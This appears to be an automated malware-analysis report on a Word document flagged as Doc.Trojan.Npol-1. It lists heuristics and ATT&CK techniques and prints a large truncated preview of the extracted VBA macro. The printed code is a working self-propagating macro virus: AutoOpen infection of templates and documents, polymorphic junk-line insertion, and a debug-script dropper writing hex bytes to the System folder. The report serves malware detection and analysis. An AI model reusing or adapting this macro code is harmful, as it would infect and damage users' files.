MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The script attempts to copy itself to other documents and templates, indicating a self-propagation behavior. The presence of Shell() calls and the ClamAV detection strongly suggest malicious intent, likely for spreading malware.
Heuristics 7
-
ClamAV: Doc.Trojan.Npol-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Npol-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 66790 bytes |
SHA-256: d4743ad677eefea3d914e4314af70fcf198cab0284d48f1eb11d814e6845fe26 |
|||
|
Detection
ClamAV:
Doc.Trojan.Npol-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FF"
Private Sub AutoOpen()
On Error Resume Next
Randomize (Timer)
SpreadDir = Application.Path & "\"
If IF = 19Then LW = 34
Victim = Dir(SpreadDir & "\*.dot")
For H = 1 To 1
Next H
Do Until Victim = ""
SetAttr SpreadDir & Victim, vbNormal
Application.OrganizerCopy ThisDocument.FullName, SpreadDir & Victim, "FF", wdOrganizerObjectProjectItems
Victim = Dir
Loop
Application.OrganizerCopy ThisDocument.FullName, SpreadDir & "\*.doc", "FF", wdOrganizerObjectProjectItems
GoTo C4536B57E
C4536B57E:
SpreadDir = Environ("WINDIR") & "\Recent"
Chk = Dir(recent & "\*.doc")
GoTo D4536B51A
D4536B51A:
If Chk = True Then Application.OrganizerCopy ThisDocument.FullName, SpreadDir & "\*.doc", "FF", wdOrganizerObjectProjectItems
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "FF" Then GoTo AlreadyDone
Next i
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "FF", wdOrganizerObjectProjectItems
AlreadyDone:
If Int(Rnd * 24) > Hour(Time) Then
MorphFactor = Int(Rnd * 10)
Select Case MorphFactor
Case 1
Fake = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 999999999))
Case 2
Fake = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & Chr(58) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(58)
Case 3
Fake = "DoEvents"
Case 4
Fake = "'" & Application.UserName & Application.UserAddress & Application.ActivePrinter
Case 5
JumpPoint = Chr(Int(Rnd * 5) + 65) & Hex(CStr(Oct(MorphFactor ^ 4) & CStr(Day(Date)) & CStr(Minute(Time)) & CStr(Hour(Time))))
Fake = "Goto " & JumpPoint & Chr(13) & JumpPoint & ":"
Case 6
Fake = Chr(13)
Case 7
Fake = "For " & Chr(MorphFactor + 65) & " = 1 To 1" & Chr(13) & "Next " & Chr(MorphFactor + 65)
Case 8
GGHC = 592119693
Fake = "Rem"
Case 9
Fake = "If " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45)) & "Then " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45))
Case 10
Fake = "Do" & Chr(13) & "Exit Do" & Chr(13) & "Loop"
End Select
ThisDocument.VBProject.VBComponents("FF").CodeModule.InsertLines Int(Rnd * ThisDocument.VBProject.VBComponents("FF").CodeModule.CountOfLines - 3) + 1, Fake
End If
Open Environ("WINDIR") & "\System\Bio.tmp" For Output As #1
Print #1, "N " & Environ("WINDIR") & "\System\" & "BIO.JPG"
Print #1, "E 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 "
Print #1, "E 0110 00 01 00 00 FF DB 00 43 00 35 25 28 2F 28 21 35 "
Print #1, "E 0120 2F 2B 2F 3C 39 35 3F 50 85 57 50 49 49 50 A3 75 "
Print #1, "E 0130 7B 61 85 C1 AA CB C8 BE AA BA B7 D5 F0 FF FF D5 "
Print #1, "E 0140 E2 FF E6 B7 BA FF FF FF FF FF FF FF FF FF CE FF "
Print #1, "E 0150 FF FF FF FF FF FF FF FF FF FF DB 00 43 01 39 3C "
Print #1, "E 0160 3C 50 46 50 9D 57 57 9D FF DC BA DC FF FF FF FF "
Print #1, "E 0170 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF "
Print #1, "E 0180 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF "
Print #1, "E 0190 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF C0 "
Print #1, "E 01A0 00 11 08 00 DB 01 33 03 01 22 00 02 11 01 03 11 "
Print #1, "E 01B0 01 FF C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 "
Print #1, "E 01C0 00 00 00 00 00 00 00 01 02 03 04
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.